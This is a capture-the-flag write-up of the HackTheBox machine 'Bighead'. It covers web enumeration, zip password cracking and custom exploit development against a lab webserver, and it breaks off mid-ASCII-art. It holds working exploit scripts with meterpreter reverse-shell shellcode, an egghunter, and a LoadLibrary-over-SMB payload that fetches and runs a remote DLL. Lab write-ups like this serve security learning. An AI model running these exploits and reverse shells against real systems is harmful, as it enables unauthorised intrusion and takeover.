LFI to finally get a shell as SYSTEM. For the final stretch there is an NTFS alternate data stream with a Keepass file that contains the final flag." -date: 2019-05-04 -classes: wide -header: - teaser: /assets/images/htb-writeup-bighead/bighead_logo.png -categories: - - hackthebox - - infosec -tags: - - exploit development - - egghunter - - asm - - nginx - - php - - keepass - - lfi - - ntfs ads - - enumeration - - insane - - windows ---- - - - -Bighead was an extremely difficult box by 3mrgnc3 that starts with website enumeration to find two sub-domains and determine there is a custom webserver software running behind an Nginx proxy. We then need to exploit a buffer overflow in the HEAD requests by creating a custom exploit. After getting a shell, there's some pivoting involved to access a limited SSH server, then an LFI to finally get a shell as SYSTEM. For the final stretch there is an NTFS alternate data stream with a Keepass file that contains the final flag. - -This box took the big part of my weekend when it came out but unfortunately I didn't keep detailed notes about everything. It was especially hard going back when doing this writeup and remember about the 418 status code and the registry key for the SSH password. Note to self: Always clean-up my notes after doing a box. - -The exploit part is especially tricky since there isn't a lot of buffer space to work with so I had to put my second stage payload in memory first with a POST request then use an egghunter for the first stage payload. There's also another way to exploit this software without using an egghunter: We can use the `LoadLibrary` function to remotely load a .dll from our machine over SMB. I'll try to cover both in this blog post. - -## Summary - -- Find the `code.bighead.htb` sub-domain after dirbusting the main website -- Enumerate `code.bighead.htb`, find reference to `dev.bighead.htb` in one of the note file -- Find the BigheadWebSvr 1.0 webserver running by checking the `coffee` directory -- Search github and find that we can download the source code for the BigheadWebSvr webserver -- Analyse the binary and determine that it is vulnerable to a buffer overflow in HEAD requests -- Develop a working exploit locally on a 32 bits Windows 7 machine -- Adapt the exploit so it works through the Nginx reverse proxy -- Get a working reverse shell with the exploit and a metepreter payload -- Find a local SSH service listening on port 2020 then set up port forwarding to reach it -- Find the nginx SSH credentials by looking in the registry then log in to bvshell -- Find an LFI vulnerability in the Testlink application then use it to get a shell as NT AUTHORITY\SYSTEM -- Get the user.txt flag and find that the root.txt is accessible but contains a troll -- Notice that Keepass is installed and that the configuration file contains a keyfile name and database file of root.txt -- Find that there is an NTFS alternate data stream in the root.txt file that contains the hidden Keepass database file -- Download the admin.png keyfile, extract the hidden stream, extract the hash from the database file and crack it with John The Ripper -- Open the Keepass database file with the keyfile and password, then recover the root.txt hash from the database - -## Tools used - -- Immunity Debugger & x96dbg -- Metasploit -- keepass2john -- John The Ripper - -### Portscan - -There's a single port open and Nginx is listening on it: - -``` -# nmap -sC -sV -p- 10.10.10.112 -Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-28 21:03 EDT -Nmap scan report for bighead.htb (10.10.10.112) -Host is up (0.0076s latency). -Not shown: 65534 filtered ports -PORT STATE SERVICE VERSION -80/tcp open http nginx 1.14.0 -|_http-server-header: nginx/1.14.0 -|_http-title: PiperNet Comes -``` - -### Website enumeration: bighead.htb - -The main website is a company front page with a contact form at the bottom. - - - -I tried checking the contact form for any stored XSS but I couldn't find any. - -A quick scan with gobuster reveals interesting directories: `/backend` and `/updatecheck` - -``` -# gobuster -q -w /usr/share/wordlists/dirb/big.txt -t 50 -u http://bighead.htb -/.htpasswd (Status: 403) -/.htaccess (Status: 403) -/Images (Status: 301) -/assets (Status: 301) -/backend (Status: 302) -/images (Status: 301) -/updatecheck (Status: 302) -``` - -`backend` simply redirects to `http://bighead.htb/BigHead` and returns a 404 error. - - - -However `/updatecheck` redirects to `http://code.bighead.htb/phpmyadmin/phpinfo.php`, so I'll add that sub-domain to the list of stuff to enumerate. - - - -After adding the sub-domain I can get to the page and it returns a `phpinfo()` output. - - - -I know the box is running `Windows Server 2008` and that it's 32 bits. - -### Website enumeration: code.bighead.htb - -If I try to browse `http://code.bighead.htb/` I'm redirected to `http://code.bighead.htb/testlink/` which has another javascript redirect script to `http://127.0.0.1:5080/testlink/`. - -Further enumeration with gobuster: -``` -# gobuster -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -t 25 -u http://code.bighead.htb | grep -vi index -2018/11/24 14:54:15 Starting gobuster - -/images (Status: 301) -/img (Status: 301) -/assets (Status: 301) -/mail (Status: 301) -/dev (Status: 301) -/phpmyadmin (Status: 301) -/webalizer (Status: 301) -/dashboard (Status: 301) -/xampp (Status: 301) -/licenses (Status: 301) -/server-status (Status: 200) -/con (Status: 403) -/aux (Status: 403) -/error_log (Status: 403) -/prn (Status: 403) -/server-info (Status: 200) -``` - -A couple interesting directories like `phpmyadmin`, `dashboard` and `xampp` but the apps are broken by design and I can't do anything with them. I got some info about the server architecture from `http://code.bighead.htb/server-info?config` but that's about it: - -``` -Server Version: Apache/2.4.33 (Win32) OpenSSL/1.0.2o PHP/5.6.36 -Server Architecture: 32-bit -``` - -It's interesting to note that the initial nmap scan found Nginx running on port 80 but here I have Apache running. That means Nginx is probably acting as a reverse proxy or load-balancer in front of Apache. - -Next, I enumerated the `/testlink` directory I found earlier and got the following: - -``` -# gobuster -q -w /usr/share/wordlists/dirb/big.txt -t 50 -u http://code.bighead.htb/testlink -s 200 -/LICENSE (Status: 200) -/ChangeLog (Status: 200) -/Index (Status: 200) -/changelog (Status: 200) -/error (Status: 200) -/index (Status: 200) -/license (Status: 200) -/linkto (Status: 200) -/note (Status: 200) -/plugin (Status: 200) -[...] -``` - -The `note` file is very interesting as it contains a hint: - -``` -BIGHEAD! You F%*#ing R*#@*d! - -STAY IN YOUR OWN DEV SUB!!!... - -You have literally broken the code testing app and tools I spent all night building for Richard! - -I don't want to see you in my code again! - -Dinesh. -``` - -So Bighead broke the app and Dinesh is telling him to get his own **DEV** sub-domain, maybe I should check if `dev.bighead.htb` exists... - -So after adding this sub-domain to the local hostfile, I can access a new page: - - - -### Website enumeration: dev.bighead.htb - -Anything that has the word `blog` and `wp-content` in it hits an nginx rule and returns a false positive for anything that contains that. I didn't find anything when I ran gobuster but dirb found the `/coffee` directory because it looks for more status codes by default. - -``` -# dirb http://dev.bighead.htb - -GENERATED WORDS: 4612 - ----- Scanning URL: http://dev.bighead.htb/ ---- -+ http://dev.bighead.htb/blog (CODE:302|SIZE:161) -+ http://dev.bighead.htb/blog_ajax (CODE:302|SIZE:161) -+ http://dev.bighead.htb/blog_inlinemod (CODE:302|SIZE:161) -+ http://dev.bighead.htb/blog_report (CODE:302|SIZE:161) -+ http://dev.bighead.htb/blog_search (CODE:302|SIZE:161) -+ http://dev.bighead.htb/blog_usercp (CODE:302|SIZE:161) -+ http://dev.bighead.htb/blogger (CODE:302|SIZE:161) -+ http://dev.bighead.htb/bloggers (CODE:302|SIZE:161) -+ http://dev.bighead.htb/blogindex (CODE:302|SIZE:161) -+ http://dev.bighead.htb/blogs (CODE:302|SIZE:161) -+ http://dev.bighead.htb/blogspot (CODE:302|SIZE:161) -+ http://dev.bighead.htb/coffee (CODE:418|SIZE:46) -+ http://dev.bighead.htb/wp-content (CODE:302|SIZE:161) -``` - -The `/coffee` directory contains a funny teapot 418 error message. - - - -I also see it's running a different webserver: `BigheadWebSvr 1.0` - -``` -# curl --head dev.bighead.htb/coffee -HTTP/1.1 200 OK -Date: Tue, 27 Nov 2018 02:20:48 GMT -Content-Type: text/html -Content-Length: 13456 -Connection: keep-alive -Server: BigheadWebSvr 1.0 -``` - -Google shows a github repository for that software: [https://github.com/3mrgnc3/BigheadWebSvr](https://github.com/3mrgnc3/BigheadWebSvr) - - - -I download `BHWS_Backup.zip` and saw that the zip file was encrypted. I can extract the hash and crack it with John: - -``` -# zip2john BHWS_Backup.zip > hash.txt -BHWS_Backup.zip->BHWS_Backup/ is not encrypted! -BHWS_Backup.zip->BHWS_Backup/conf/ is not encrypted! -# cat hash.txt -BHWS_Backup.zip:$zip2$*0*3*0*231ffea3729caa2f37a865b0dca373d7*d63f*49*61c6e7d2949fb22573c57dec460346954bba23dffb11f1204d4a6bc10e91b4559a6b984884fcb376ea1e2925b127b5f6721c4ef486c481738b94f08ac09df30c30d2ae3eb8032c586f*28c1b9eb8b0e1769b4d3*$/zip2$:::::BHWS_Backup.zip -``` - -``` -# john -w=/usr/share/wordlists/rockyou.txt --fork=4 hash.txt -Using default input encoding: UTF-8 -Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 128/128 AVX 4x]) -Node numbers 1-4 of 4 (fork) -Press 'q' or Ctrl-C to abort, almost any other key for status -2 0g 0:00:00:00 DONE (2018-11-26 21:41) 0g/s 0p/s 0c/s 0C/s -3 0g 0:00:00:00 DONE (2018-11-26 21:41) 0g/s 0p/s 0c/s 0C/s -4 0g 0:00:00:00 DONE (2018-11-26 21:41) 0g/s 0p/s 0c/s 0C/s -thepiedpiper89 (BHWS_Backup.zip) -1 1g 0:00:00:00 DONE (2018-11-26 21:41) 100.0g/s 100.0p/s 100.0c/s 100.0C/s thepiedpiper89 -Waiting for 3 children to terminate -Use the "--show" option to display all of the cracked passwords reliably -Session completed -``` - -Password is : `thepiedpiper89` - -The archive contains the following files: - -``` --rw-r--r-- 1 root root 75 Jul 14 2018 BigheadWebSvr_exe_NOTICE.txt -drwx------ 2 root root 4096 Jul 2 2018 conf --rw-r--r-- 1 root root 1103 Jun 23 2018 fastcgi.conf --rw-r--r-- 1 root root 1032 Jun 23 2018 fastcgi_params --rw-r--r-- 1 root root 2946 Jun 23 2018 koi-utf --rw-r--r-- 1 root root 2326 Jun 23 2018 koi-win --rw-r--r-- 1 root root 5265 Jun 23 2018 mime.types --rw-r--r-- 1 root root 4523 Jul 2 2018 nginx.conf --rw-r--r-- 1 root root 653 Jun 23 2018 scgi_params --rw-r--r-- 1 root root 681 Jun 23 2018 uwsgi_params --rw-r--r-- 1 root root 3736 Jun 23 2018 win-utf -``` - -The .exe in the archive was replaced with a note instead: - -``` -# cat BigheadWebSvr_exe_NOTICE.txt -I removed this vulnerable crapware from the archive - -love -Gilfoyle... :D -``` - -The file history on Github shows an older copy of the zip file: - - - -I downloaded the file then tried to extract it but the password is not `thepiedpiper89`. I cracked the password again and found the older commit uses `bighead` as the archive password. After extracting the file I can see there is a `BigheadWebSvr.exe` binary in there instead of the note. - -``` -# ls -l -total 132 --rw-r--r-- 1 root root 28540 Jul 2 16:33 bHeadSvr.dll -drwx------ 2 root root 4096 Jul 2 19:56 BHWS_Backup --rw-r--r-- 1 root root 51431 Jul 2 16:33 BigheadWebSvr.exe -drwx------ 2 root root 4096 Jul 2 19:57 conf --rw-r--r-- 1 root root 1103 Jun 23 11:50 fastcgi.conf --rw-r--r-- 1 root root 1032 Jun 23 11:50 fastcgi_params --rw-r--r-- 1 root root 2946 Jun 23 11:50 koi-utf --rw-r--r-- 1 root root 2326 Jun 23 11:50 koi-win --rw-r--r-- 1 root root 5265 Jun 23 11:50 mime.types --rw-r--r-- 1 root root 4523 Jul 2 15:34 nginx.conf --rw-r--r-- 1 root root 653 Jun 23 11:50 scgi_params --rw-r--r-- 1 root root 681 Jun 23 11:50 uwsgi_params --rw-r--r-- 1 root root 3736 Jun 23 11:50 win-utf -``` - -``` -# file BigheadWebSvr.exe -BigheadWebSvr.exe: PE32 executable (console) Intel 80386, for MS Windows -``` - -There is also an nginx config file which shows the following interesting stuff: - -``` -location / { - # Backend server to forward requests to/from - proxy_pass http://127.0.0.1:8008; - proxy_cache_convert_head off; - proxy_cache_key $scheme$proxy_host$request_uri$request_method; - proxy_http_version 1.1; - - # adds gzip - gzip_static on; - } - -location /coffee { - # Backend server to forward requests to/from - #rewrite /coffee /teapot/ redirect; - #return 418; - proxy_pass http://127.0.0.1:8008; - proxy_cache_convert_head off; - proxy_intercept_errors off; - proxy_cache_key $scheme$proxy_host$request_uri$request_method; - proxy_http_version 1.1; - proxy_pass_header Server; - # adds gzip - gzip_static on; - } -``` - -So, both requests to `/` and `/coffee` on dev.bighead.htb are served by that crap custom webserver but only `/coffee` reveals the server header because of the `proxy_pass_header Server` config file. - -### Exploit development (Method #1 using egghunter) - -After opening the .exe file in IDA Free, I saw that the binary was compiled with Mingw. From what I googled, none of the protections like DEP/NX are enabled by default when compiling with mingw so that should make exploitation easier. - - - -The main function sets up up the socket listener and creates a `ConnectionHandler` thread when it receives a connection: - - - -The `ConnectionHandler` has multiple branches for the different HTTP methods. The `HEAD` request calls the `Function4` function. - - - - - -The function uses an insecure `strcpy` to move data around so it's possible there is a buffer overflow. - - - -I used the open-source [x32/64dbg](https://x64dbg.com/) debugger to debug the software. - -I setup a breakpoint at the end of `Function4` just before it returns. - - - -First, I test with a small payload that should not crash the server just to see if it catches the breakpoint and what the memory layout looks like. - -`curl --head http://172.23.10.186:8008/AAAAAAAAAAAAAA` - -The program stops at the breakpoint and `EAX` contains the memory address where the HEAD request is located. - - - -The memory at `0x175FB28` contains part of the HEAD request. - -Next, I try sending 100 bytes and see if I can crash the program. - -`curl --head http://172.23.10.186:8008/$(python -c 'print "A"*100')` - -The program crashes, and I can see that the `EIP` register was overwritten by `AAAAAAAA` which is not a valid address here. - - - -Next I have to find the exact amount of data to push to overwrite EIP. After I few minutes I was able to find the exact offset: - -`curl --head http://172.23.10.186:8008/$(python -c 'print(("A"*72)+("B"*8))')` - - - -I used mona in Immunity Debugger to confirm that no protection are enabled on `BigheadWebSvr.exe` - - - -Now I need to redirect the execution of the program to the `EAX` register value since this is where my payload will be located. I will use mona to look for gadgets in the program that I can use to jump to. Specifically, I'm looking for the memory address of a `JMP EAX` instruction. - - - -I found a gadget at address `0x625012f2` in the bHeadSvr.dll. No protection is enabled on this DLL. - -To test, I'll replace `BBBBBBBB` from my payload with the memory address of the `JMP EAX`. Notice the address is in the reverse order to respect the endianess. - -`curl --head http://172.23.10.186:8008/$(python -c 'print(("A"*72)+("f2125062"))')` - -After the function returns, the `EIP` points to the `JMP EAX` instruction. - - - -Then it jumps to the memory address of `EAX`. We see here we only have 36 bytes of buffer space to work with. - - - -I'll align the stack first by pushing and popping the `EAX` value into `ESP`. To find the opcode for this I used `nasm_shell.rb` from Metasploit: - -``` -# /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb -nasm > push eax -00000000 50 push eax -nasm > pop esp -00000000 5C pop esp -``` - -Edit: In retrospect I don't this part was required for this exploit, the exploit should have worked anyways because it doesn't push/pop stuff off the stack. - -Since I don't have much buffer space to work with I'll use a 32 bytes egghunter. Basically the egghunter is a small shellcode that looks for a marker (the egg) in memory and jumps to it when it finds it. This is the first stage of the exploit, the 2nd stage will be the rest of the shellcode we want to execute and we'll need to place it in memory with another HTTP request. Mona can generate the code for the egghunter. By default it uses the string `w00t` for the egg. - - - -The first stage payload is: -- Align stack -- Egghunter shellcode -- JMP EAX - -The second stage payload is: -- w00tw00t (egg) -- meterpreter payload - -The exploit tested locally on my Win7 VM is shown here: - -```python -#!/usr/bin/python - -from pwn import * - -''' -# msfvenom -p windows/meterpreter/reverse_tcp -b \x00\x0a\x0d -f python LHOST=172.23.10.39 LPORT=80 -[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload -[-] No arch selected, selecting arch: x86 from the payload -Found 11 compatible encoders -Attempting to encode payload with 1 iterations of x86/shikata_ga_nai -x86/shikata_ga_nai succeeded with size 368 (iteration=0) -x86/shikata_ga_nai chosen with final size 368 -Payload size: 368 bytes -Final size of python file: 1772 bytes -''' - -egg = "\x77\x30\x30\x74" # w00t -payload = egg + egg -payload += "\xbf\x33\x30\xf9\x54\xdd\xc2\xd9\x74\x24\xf4\x5a\x29" -payload += "\xc9\xb1\x56\x31\x7a\x13\x83\xea\xfc\x03\x7a\x3c\xd2" -payload += "\x0c\xa8\xaa\x90\xef\x51\x2a\xf5\x66\xb4\x1b\x35\x1c" -payload += "\xbc\x0b\x85\x56\x90\xa7\x6e\x3a\x01\x3c\x02\x93\x26" -payload += "\xf5\xa9\xc5\x09\x06\x81\x36\x0b\x84\xd8\x6a\xeb\xb5" -payload += "\x12\x7f\xea\xf2\x4f\x72\xbe\xab\x04\x21\x2f\xd8\x51" -payload += "\xfa\xc4\x92\x74\x7a\x38\x62\x76\xab\xef\xf9\x21\x6b" -payload += "\x11\x2e\x5a\x22\x09\x33\x67\xfc\xa2\x87\x13\xff\x62" -payload += "\xd6\xdc\xac\x4a\xd7\x2e\xac\x8b\xdf\xd0\xdb\xe5\x1c" -payload += "\x6c\xdc\x31\x5f\xaa\x69\xa2\xc7\x39\xc9\x0e\xf6\xee" -payload += "\x8c\xc5\xf4\x5b\xda\x82\x18\x5d\x0f\xb9\x24\xd6\xae" -payload += "\x6e\xad\xac\x94\xaa\xf6\x77\xb4\xeb\x52\xd9\xc9\xec" -payload += "\x3d\x86\x6f\x66\xd3\xd3\x1d\x25\xbb\x10\x2c\xd6\x3b" -payload += "\x3f\x27\xa5\x09\xe0\x93\x21\x21\x69\x3a\xb5\x30\x7d" -payload += "\xbd\x69\xfa\xee\x43\x8a\xfa\x27\x80\xde\xaa\x5f\x21" -payload += "\x5f\x21\xa0\xce\x8a\xdf\xaa\x58\x99\x08\xa1\xbf\x89" -payload += "\x34\xb5\xbf\x19\xb1\x53\xef\xc9\x91\xcb\x50\xba\x51" -payload += "\xbc\x38\xd0\x5e\xe3\x59\xdb\xb5\x8c\xf0\x34\x63\xe4" -payload += "\x6c\xac\x2e\x7e\x0c\x31\xe5\xfa\x0e\xb9\x0f\xfa\xc1" -payload += "\x4a\x7a\xe8\x36\x2d\x84\xf0\xc6\xd8\x84\x9a\xc2\x4a" -payload += "\xd3\x32\xc9\xab\x13\x9d\x32\x9e\x20\xda\xcd\x5f\x10" -payload += "\x90\xf8\xf5\x1c\xce\x04\x1a\x9c\x0e\x53\x70\x9c\x66" -payload += "\x03\x20\xcf\x93\x4c\xfd\x7c\x08\xd9\xfe\xd4\xfc\x4a" -payload += "\x97\xda\xdb\xbd\x38\x25\x0e\xbe\x3f\xd9\xcc\xe9\xe7" -payload += "\xb1\x2e\xaa\x17\x41\x45\x2a\x48\x29\x92\x05\x67\x99" -payload += "\x5b\x8c\x20\xb1\xd6\x41\x82\x20\xe6\x4b\x42\xfc\xe7" -payload += "\x78\x5f\x0f\x9d\xf1\x60\xf0\x62\x18\x05\xf1\x62\x24" -payload += "\x3b\xce\xb4\x1d\x49\x11\x05\x1a\x42\x24\x28\x0b\xc9" -payload += "\x46\x7e\x4b\xd8" - -stage1 = "POST /coffee HTTP/1.1\r\n" -stage1 += "Host: dev.bighead.htb\r\n" -stage1 += "Content-Length: {}\r\n\r\n".format(len(payload)) -stage1 += payload + "\r\n" -stage1 += "\r\n" - -r = remote('172.23.10.186', 8008) -r.send(stage1) -r.recv() - -r = remote('172.23.10.186', 8008) -jmp_eax = "f2125062" -align_esp = "505C" # push eax, pop esp -egghunter = "6681caff0f42526a0258cd2e3c055a74efb8773030748bfaaf75eaaf75e7ffe7" -stage2 = align_esp + egghunter + "9090" + jmp_eax - -r.send("HEAD /" + stage2 + " HTTP/1.1\r\nHost: dev.bighead.htb\r\n\r\n") -``` - -When the egghunter is scanning memory, CPU usage goes to 100% for a few seconds. - - - -When it hits the egg, it executes the meterpreter stager and we get a connection: - -``` -msf5 exploit(multi/handler) > [*] Encoded stage with x86/shikata_ga_nai -[*] Sending encoded stage (179808 bytes) to 172.23.10.186 -[*] Meterpreter session 1 opened (172.23.10.39:80 -> 172.23.10.186:49804) at 2019-05-03 19:37:47 -0400 - -msf5 exploit(multi/handler) > sessions 1 -[*] Starting interaction with 1... -``` - -Nice, the exploit works locally. - -But when I tried running it against Bighead it didn't work so I replicated the nginx setup locally in Win7 and found that the second stage shellcode was being URL encoded by nginx. To work around this I had to fix the POST request and remove the `Content-Type` header so it would not URL encode the payload then switch the content body to the raw shellcode (non URL-encoded). - -The final exploit looks like this: - -```python -#!/usr/bin/python - -from pwn import * -import requests - -''' -# msfvenom -p windows/meterpreter/reverse_tcp -b \x00\x0a\x0d -f python LHOST=10.10.14.23 LPORT=80 -[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload -[-] No arch selected, selecting arch: x86 from the payload -Found 11 compatible encoders -Attempting to encode payload with 1 iterations of x86/shikata_ga_nai -x86/shikata_ga_nai succeeded with size 368 (iteration=0) -x86/shikata_ga_nai chosen with final size 368 -Payload size: 368 bytes -Final size of python file: 1772 bytes -''' - -egg = "\x77\x30\x30\x74" # w00t -payload = egg + egg -payload += "\xb8\xc3\x06\x6e\xa1\xd9\xcd\xd9\x74\x24\xf4\x5f\x2b" -payload += "\xc9\xb1\x56\x83\xef\xfc\x31\x47\x0f\x03\x47\xcc\xe4" -payload += "\x9b\x5d\x3a\x6a\x63\x9e\xba\x0b\xed\x7b\x8b\x0b\x89" -payload += "\x08\xbb\xbb\xd9\x5d\x37\x37\x8f\x75\xcc\x35\x18\x79" -payload += "\x65\xf3\x7e\xb4\x76\xa8\x43\xd7\xf4\xb3\x97\x37\xc5" -payload += "\x7b\xea\x36\x02\x61\x07\x6a\xdb\xed\xba\x9b\x68\xbb" -payload += "\x06\x17\x22\x2d\x0f\xc4\xf2\x4c\x3e\x5b\x89\x16\xe0" -payload += "\x5d\x5e\x23\xa9\x45\x83\x0e\x63\xfd\x77\xe4\x72\xd7" -payload += "\x46\x05\xd8\x16\x67\xf4\x20\x5e\x4f\xe7\x56\x96\xac" -payload += "\x9a\x60\x6d\xcf\x40\xe4\x76\x77\x02\x5e\x53\x86\xc7" -payload += "\x39\x10\x84\xac\x4e\x7e\x88\x33\x82\xf4\xb4\xb8\x25" -payload += "\xdb\x3d\xfa\x01\xff\x66\x58\x2b\xa6\xc2\x0f\x54\xb8" -payload += "\xad\xf0\xf0\xb2\x43\xe4\x88\x98\x0b\xc9\xa0\x22\xcb" -payload += "\x45\xb2\x51\xf9\xca\x68\xfe\xb1\x83\xb6\xf9\xc0\x84" -payload += "\x48\xd5\x6a\xc4\xb6\xd6\x8a\xcc\x7c\x82\xda\x66\x54" -payload += "\xab\xb1\x76\x59\x7e\x2f\x7d\xcd\x8b\xa5\x8f\x1a\xe4" -payload += "\xbb\x8f\x24\xa4\x32\x69\x74\x14\x14\x26\x35\xc4\xd4" -payload += "\x96\xdd\x0e\xdb\xc9\xfe\x30\x36\x62\x94\xde\xee\xda" -payload += "\x01\x46\xab\x91\xb0\x87\x66\xdc\xf3\x0c\x82\x20\xbd" -payload += "\xe4\xe7\x32\xaa\x92\x07\xcb\x2b\x37\x07\xa1\x2f\x91" -payload += "\x50\x5d\x32\xc4\x96\xc2\xcd\x23\xa5\x05\x31\xb2\x9f" -payload += "\x7e\x04\x20\x9f\xe8\x69\xa4\x1f\xe9\x3f\xae\x1f\x81" -payload += "\xe7\x8a\x4c\xb4\xe7\x06\xe1\x65\x72\xa9\x53\xd9\xd5" -payload += "\xc1\x59\x04\x11\x4e\xa2\x63\x21\x89\x5c\xf1\x0e\x32" -payload += "\x34\x09\x0f\xc2\xc4\x63\x8f\x92\xac\x78\xa0\x1d\x1c" -payload += "\x80\x6b\x76\x34\x0b\xfa\x34\xa5\x0c\xd7\x99\x7b\x0c" -payload += "\xd4\x01\x8c\x77\x95\xb6\x6d\x88\xbf\xd2\x6e\x88\xbf" -payload += "\xe4\x53\x5e\x86\x92\x92\x62\xbd\xad\xa1\xc7\x94\x27" -payload += "\xc9\x54\xe6\x6d" - -data = {"payload": payload} -proxies = {"http": "http://127.0.0.1:8080"} - -s = requests.Session() -r = requests.Request("POST", "http://dev.bighead.htb/coffee/", data=data) -p = r.prepare() -p.body = payload -del p.headers["Content-Type"] -try: - s.send(p, proxies=proxies, timeout=0.2) -except requests.exceptions.ReadTimeout: - pass - -r = remote("10.10.10.112", 80) -jmp_eax = "f2125062" -align_esp = "505C" # push eax, pop esp -egghunter = "6681caff0f42526a0258cd2e3c055a74efb8773030748bfaaf75eaaf75e7ffe7" -stage2 = align_esp + egghunter + "9090" + jmp_eax - -r.send("HEAD /" + stage2 + " HTTP/1.1\r\nHost: dev.bighead.htb\r\n\r\n") -``` - -Launching exploit... -``` -# python exploit.py -[+] Opening connection to 10.10.10.112 on port 80: Done -[*] Closed connection to 10.10.10.112 port 80 - -msf5 exploit(multi/handler) > -[*] Encoded stage with x86/shikata_ga_nai -[*] Sending encoded stage (179808 bytes) to 10.10.10.112 -[*] Meterpreter session 4 opened (10.10.14.23:80 -> 10.10.10.112:49306) at 2019-05-03 20:47:52 -0400 - -msf5 exploit(multi/handler) > -msf5 exploit(multi/handler) > sessions 4 -[*] Starting interaction with 4... - -meterpreter > getuid -Server username: PIEDPIPER\Nelson -``` - -### Exploit development (Method #2 using LoadLibrary over SMB) - -Instead of using an egghunter, we can also use the `LoadLibrary` function to load a remote DLL hosted on our machine through the Impacket SMB server. Using the debugger, I can see that the `LoadLibrary` is exported from `bheadsrv.dll` at address `0x625070C8`. - - - -The function is simple and only expects a single parameter: the filename of the DLL file: - -``` -HMODULE LoadLibraryA( - LPCSTR lpLibFileName -); -``` - -The exploit uses the same `JMP EAX` gadget to jump to the beginning of the buffer. Then we align the stack, and set `EAX` past the buffer and we push it to the stack: this will contain the address of the string of our SMB server. Finally we move the address of `LoadLibrary` into `EBX` then `CALL EBX` to call the function. The filename argument for `LoadLibrary` is popped from the stack and the DLL is then loaded. - -``` -nasm > add al, 0x28 -00000000 0428 add al,0x28 - -nasm > push eax -00000000 50 push eax - -nasm > mov ebx, 0x62501B58 -00000000 BB581B5062 mov ebx,0x62501b58 - -nasm > call ebx -00000000 FFD3 call ebx -``` - -The final exploit looks like this: - -```python -#!/usr/bin/python -from pwn import * -import binascii - -r = remote("10.10.10.112", 80) - -load_lib = "" -load_lib += "\x80\x04\x28" # add ah, 28h -load_lib += "\x50" # push eax -load_lib += "\xBB\x58\x1B\x50\x62" # 62501B58 ebx -> LoadLibrary -load_lib += "\xFF\xD3" # call ebx - -smb = "\\\\10.10.14.23\\share\\x.dll" -load_lib = binascii.hexlify(load_lib) -smb = binascii.hexlify(smb) - -jmp_eax = "f2125062" -align_esp = "505C" # push eax, pop esp -buf = align_esp + load_lib + "90" * 24 + jmp_eax + smb -head = "HEAD /" + buf + " HTTP/1.1\r\n" -head += "Host: dev.bighead.htb\r\n" -head += "Connection: close\r\n" -head += "\r\n" -r.send(head) -r.close() -``` - -This makes the server download a .dll from my box and execute it. So I can generate a malicious DLL with msfvenom and have the server fetch it to give me a reverse shell: - -``` -# msfvenom -p windows/meterpreter/reverse_tcp -o x.dll -f dll LHOST=10.10.14.23 LPORT=4444 -[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload -[-] No arch selected, selecting arch: x86 from the payload -No encoder or badchars specified, outputting raw payload -Payload size: 341 bytes -Final size of dll file: 5120 bytes -Saved as: x.dll -``` - -Because the server uses SMB to talk back to us, we'll start an SMB share with Impacket: - -``` -# /usr/share/doc/python-impacket/examples/smbserver.py share . -Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies - -[*] Config file parsed -[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 -[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 -[*] Config file parsed -[*] Config file parsed -[*] Config file parsed -``` - -Firing up the exploit... - -``` -# python smbexploit.py -191 -HEAD /505C042850bb581b5062ffd3909090909090909090909090909090909090909090909090f21250625c5c31302e31302e31342e32335c73686172655c782e646c6c HTTP/1.1 -Host: dev.bighead.htb -Connection: close -... -[*] Incoming connection (10.10.10.112,60888) -[*] AUTHENTICATE_MESSAGE (PIEDPIPER\Nelson,PIEDPIPER) -[*] User Nelson\PIEDPIPER authenticated successfully -[*] Nelson::PIEDPIPER:4141414141414141:e8e4ea60eb43ad439299c50c245654ca:010100000000000000f1a060fc85d4017e4c61f17754814500000000010010004f00650051004a00490073005600450002001000730047006b007400540068006f005600030010004f00650051004a00490073005600450004001000730047006b007400540068006f0056000700080000f1a060fc85d40106000400020000000800300030000000000000000000000000200000282e2960465001d017bb89eae52e3c9002f1edefda8c004fd0186e57fb9bd3eb000000000000000000000000 -[*] Disconnecting Share(1:IPC$) -... -msf exploit(multi/handler) > [*] Sending stage (179779 bytes) to 10.10.10.112 -[*] Meterpreter session 1 opened (10.10.14.23:4444 -> 10.10.10.112:60889) at 2018-11-26 21:53:32 -0500 - -msf exploit(multi/handler) > sessions 1 -[*] Starting interaction with 1... - -meterpreter > getuid -Server username: PIEDPIPER\Nelson -``` - -### Windows enumeration - -Now that I finally have a shell, I tried to get `user.txt` but this version is just a troll: - -``` -meterpreter > cat /users/nelson/desktop/user.txt - - .-''-. .-------. .---. .-./`) _______ .---. .---. - .'_ _ \ | _ _ \ | ,_| \ .-.') / __ \ | | |_ _| - / ( ` ) '| ( ' ) | ,-./ ) / `-' \ | ,_/ \__) | | ( ' ) -. (_ o _) ||(_ o _) / \ '_ '`) `-'`"`,-./ ) | '-(_{;}_) -| (_,_)___|| (_,_).' __ > (_) ) .---. \ '_ '`) | (_,_) -' \ .---.| |\ \ | |( . .-' | | > (_) ) __ | _ _--. | - \ `-' /| | \ `' / `-'`-'|___ | | ( . .-'_/ )|( ' ) | | - \ / | | \ / | \| | `-'`-' / (_{;}_)| | - `'-..-' ''-' `'-' `--------`'---' `._____.' '(_,_) '---' - .---. ,-----. ,---. ,---. .-''-. .-'''-. - | ,_| .' .-, '. | / | | .'_ _ \ / _ \ - ,-./ ) / ,-.| \ _ \ | | | .'/ ( ` ) ' (`' )/`--' - \ '_ '`) ; \ '_ / | :| | _ | |. (_ o _) |(_ o _). - > (_) ) | _`,/ \ _/ || _( )_ || (_,_)___| (_,_). '. - ( . .-' : ( '\_/ \ ;\ (_ o._) /' \ .---..---. \ : - `-'`-'|___\ `"/ \ ) / \ (_,_) / \ `-' /\ `-' | - | \'. \_/``".' \ / \ / \ / - `--------` '-----' `---` `'-..-' `-...-' - ,---------. .---. .---. .-''-. - \ \| | |_ _| .'_ _ \ - `--. ,---'| | ( ' ) / ( ` ) ' - | \ | '-(_{;}_). (_ o _) | - :_ _: | (_,_) | (_,_)___| - (_I_) | _ _--. | 